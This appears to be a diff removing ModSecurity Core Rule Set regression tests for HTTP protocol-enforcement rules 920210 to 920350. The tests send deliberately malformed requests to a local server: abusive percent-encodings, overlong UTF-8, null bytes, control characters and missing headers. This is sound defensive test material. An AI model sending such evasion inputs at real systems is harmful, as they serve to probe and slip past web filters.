stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "keep-alive,keep-alive"
output:
log_contains: "id \"920210\""
- test_title: 920210-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "keep-alive,close"
output:
log_contains: "id \"920210\""
- test_title: 920210-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "close,close"
output:
log_contains: "id \"920210\""
- test_title: 920210-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Connection: "User-Agent"
output:
no_log_contains: "id \"920210\""
- test_title: 920210-6
desc: Multiple/Conflicting Connection Header Data Found (920210) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Connection: keep-alive, keep-alive
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920210"
- test_title: 920210-7
desc: Multiple/Conflicting Connection Header Data Found (920210) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Connection: close, close
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920210"


@ -1,72 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920220.yaml"
description: "Tests to trigger rule 920220"
tests:
- # This gets a percent but not a number after, invalid
test_title: 920220-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?x=%w20"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920220\""
- # We have a valid percent encoding here
test_title: 920220-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?x=xyz%20%99"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920220\""
- # url encoding includes spaces as plusses, this is valid
test_title: 920220-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=This+is+a+test"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920220\""
- # testURL Encoding Abuse Attack Attempt from old modsec regressions
test_title: 920220-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?parm=%7%6F%6D%65%74%65%78%74%5F%31%32%33%"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920220\""
- # testURL Encoding Abuse Attack Attempt from old modsec regressions
test_title: 920220-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?parm=%1G"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920220\""


@ -1,43 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920230.yaml"
description: "Description"
tests:
- # From old modsec regression tests
test_title: 920230-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?parm=%25%37%33%25%36%46%25%36%44%25%36%35%25%37%34%25%36%35%25%37%38%25%37%34%25%35%46%25%33%31%25%33%32%25%33%33%25%33%34"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920230\""
- # From old modsec regression tests
test_title: 920230-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?parm=%7%6F%6D%65%74%65%78%74%5F%31%32%33%"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
no_log_contains: "id \"920230\""


@ -1,123 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920240.yaml"
description: "Description"
tests:
- test_title: 920240-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: 11
data: "x=new %w20$"
stop_magic: true
output:
log_contains: "id \"920240\""
- test_title: 920240-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests #FN This should Trigger"
Host: "localhost%00"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: 10
data: "x=new %20$"
stop_magic: true
output:
no_log_contains: "id \"920240\""
- test_title: 920240-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "param=value"
output:
no_log_contains: "id \"920240\""
- # We have a valid percent encoding here
test_title: 920240-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
Content-Type: "text/xml"
data: |
<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">
<SOAP-ENV:Body>
<xkms:StatusRequest xmlns:xkms=\"http://www.w3.org/2002/03/xkms#\" Id=\"_6ee48478-fdd6-4d7d-b1bf-e7b4c3254659\" ResponseId=\"_c1c36b3f-f962-4aea-bfbd-07ed58468c9b\" Service=\"http://www.soapclient.com/xml/xkms2\">
<xkms:ResponseMechanism>http://www.w3.org/2002/03/xkms#Pending</xkms:ResponseMechanism>
<xkms:RespondWith>%1Gwww.attack.org</xkms:RespondWith>
</xkms:StatusRequest>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
output:
no_log_contains: "id \"920240\""
- # test URL Encoding Abuse Attack Attempt from old regression tests
test_title: 920240-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "9"
data: "param=%1G"
stop_magic: true
output:
log_contains: "id \"920240\""
- # test URL Encoding Abuse Attack Attempt from old regression tests
test_title: 920240-6
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
Content-Type: "application/x-www-form-urlencoded"
data: "param=%7%6F%6D%65%74%65%78%74%5F%31%32%33%"
output:
log_contains: "id \"920240\""


@ -1,62 +0,0 @@
---
meta:
author: "csanders-git"
enabled: false
name: "920250.yaml"
description: "Description"
tests:
- # crs-setup.conf needs to have CRS_VALIDATE_UTF8_ENCODING set
# Taken from existing modsec regression
test_title: 920250-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?param=%c0%af"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920250\""
- # Taken from existing modsec regression
test_title: 920250-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?param=%c0"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920250\""
- # Taken from existing modsec regression
test_title: 920250-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?param=%F5%80%BF%BF"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920250\""


@ -1,50 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920260.yaml"
description: "Description"
tests:
- test_title: 920260-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=%uff0F"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920260\""
- test_title: 920260-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=%u0F"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920260\""
- # Test taken from existing modsec regression
test_title: 920260-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?param=foo%uFF01"
version: "HTTP/1.0"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920260\""


@ -1,125 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920270.yaml"
description: "Description"
tests:
- test_title: 920270-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%00=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920270\""
- test_title: 920270-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%00"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920270\""
- test_title: 920270-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%00=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920270\""
- # This causes apache to error before it gets to CRS. Therefore
# we'll mark this as a status 400 now until the FTW OR output is added
test_title: 920270-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost%00"
output:
status: [403, 400]
# log_contains: "id \"920270\""
- test_title: 920270-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Referer: "anything%00"
output:
log_contains: "id \"920270\""
- test_title: 920270-6
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%40=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920270\""
- test_title: 920270-7
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%FD=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920270\""
- test_title: 920270-8
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%FD=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920270\""
- # Test converted from old tests
test_title: 920270-9
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?param=foo%00"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
Accept-Language: "en-us,en;q=0.5"
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Keep-Alive: "300"
Proxy-Connection: "keep-alive"
output:
log_contains: "id \"920270\""


@ -1,80 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920271.yaml"
description: "Description"
tests:
- test_title: 920271-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%127"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920271\""
- test_title: 920271-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%03"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920271\""
- test_title: 920271-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test%00=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920271\""
- test_title: 920271-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cookie: hi%13=bye
output:
log_contains: "id \"920271\""
- test_title: 920271-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/%20index.html?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920271\""
- test_title: 920271-6
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/%FFindex.html?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920271\""


@ -1,68 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920272.yaml"
description: "Description"
tests:
- test_title: 920272-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%25"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920272\""
- test_title: 920272-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%80"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920272\""
- test_title: 920272-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/index.html?test=t%FFest1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920272\""
- test_title: 920272-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%35"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920272\""
- # This will not trigger with Apache because Apache will block with AH00127
test_title: 920272-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/i%FFndex.html?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
status: [403, 404]


@ -1,69 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920273.yaml"
description: "Description"
tests:
- test_title: 920273-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%20"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920273\""
- # the '&' is one of the only symbol allowed
test_title: 920273-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1&test=t"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920273\""
- test_title: 920273-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/index.html?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
data: "<hello"
output:
log_contains: "id \"920273\""
- test_title: 920273-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%5FHI"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920273\""
- test_title: 920273-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%60HI"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920273\""


@ -1,75 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920274.yaml"
description: "Description"
tests:
- # Apache will just error on this and return 400
# as a result we look for forbidden or 400
# In the future FTW should support OR versus AND output
# https://github.com/CRS-support/ftw/issues/19
test_title: 920274-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost%1F"
output:
status: [200, 403, 400]
# log_contains: "id \"920274\""
- test_title: 920274-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/index.html?test=test1"
headers:
User-Agent: "<ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920274\""
- test_title: 920274-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1HI"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Test: "ThisISATEST%5F"
output:
no_log_contains: "id \"920274\""
- test_title: 920274-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1HI"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Test: "ThisIsATest%60"
output:
log_contains: "id \"920274\""
- test_title: 920274-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1HI"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cookie: "ThisIsATest%60"
output:
no_log_contains: "id \"920274\""


@ -1,41 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920280.yaml"
description: "Description"
tests:
- test_title: 920280-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "HTTP/1.0"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
output:
log_contains: "id \"920280\""
- test_title: 920280-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920280\""
- test_title: 920280-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "HTTP/0.9"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
output:
# Technically valid but Apache doesn't allow 0.9 anymore
status: [400]


@ -1,21 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920290.yaml"
description: "Description"
tests:
- # Apache will block this with a 400 and it will
# never get to CRS. We will fix this more when
# FTW supports the OR operator for outputs.
test_title: 920290-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: ""
output:
status: [403, 400]


@ -1,28 +0,0 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 920300.yaml
tests:
- test_title: 920300-1
desc: Request Missing an Accept Header (920300) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.0
data: ''
output:
log_contains: id "920300"


@ -1,80 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920310.yaml"
description: "Description"
tests:
- test_title: 920310-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: ""
output:
log_contains: "id \"920310\""
- test_title: 920310-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "OPTIONS"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: ""
output:
no_log_contains: "id \"920310\""
- test_title: 920310-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests Enterprise"
Host: "localhost"
Accept: ""
output:
no_log_contains: "id \"920310\""
- test_title: 920310-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: lol
Host: "localhost"
Accept: ""
output:
log_contains: "id \"920310\""
- test_title: 920310-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "Business/6.6.1.2 CFNetwork/758.5.3 Darwin/15.6.0"
Host: "localhost"
Accept: ""
output:
no_log_contains: "id \"920310\""
- test_title: 920310-6
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "Entreprise/6.5.0.177 CFNetwork/758.4.3 Darwin/15.5.0"
Host: "localhost"
Accept: ""
output:
no_log_contains: "id \"920310\""


@ -1,42 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920311.yaml"
description: "Description"
tests:
- test_title: 920311-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
Host: "localhost"
Accept: ""
output:
log_contains: "id \"920311\""
- test_title: 920311-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "OPTIONS"
headers:
Host: "localhost"
Accept: ""
output:
no_log_contains: "id \"920311\""
- test_title: 920311-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests Enterprise"
Host: "localhost"
Accept: "text/plain, text/html"
output:
no_log_contains: "id \"920311\""


@ -1,28 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920320.yaml"
description: "Description"
tests:
- test_title: 920320-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
Host: "localhost"
output:
log_contains: "id \"920320\""
- test_title: 920320-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests Enterprise"
Host: "localhost"
output:
no_log_contains: "id \"920320\""


@ -1,29 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920320.yaml"
description: "Description"
tests:
- test_title: 920330-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: ""
Host: "localhost"
output:
log_contains: "id \"920330\""
- test_title: 920330-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests Enterprise"
Host: "localhost"
output:
no_log_contains: "id \"920330\""


@ -1,34 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920340.yaml"
description: "Description"
tests:
- test_title: 920340-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Length: "2"
data: "xy"
stop_magic: true
output:
log_contains: "id \"920340\""
- test_title: 920340-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Length: "50"
stop_magic: true
output:
expect_error: true


@ -1,49 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920350.yaml"
description: "Description"
tests:
- test_title: 920350-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "127.0.0.1"
protocol: "http"
uri: "/"
output:
log_contains: "id \"920350\""
- test_title: 920350-2
stages:
- stage:
input:
dest_addr: "localhost"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/"
output:
no_log_contains: "id \"920350\""
- test_title: 920350-3
stages:
- stage:
input:
dest_addr: "localhost"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "1.2.3.4"
protocol: "http"
uri: "/"
output:
log_contains: "id \"920350\""
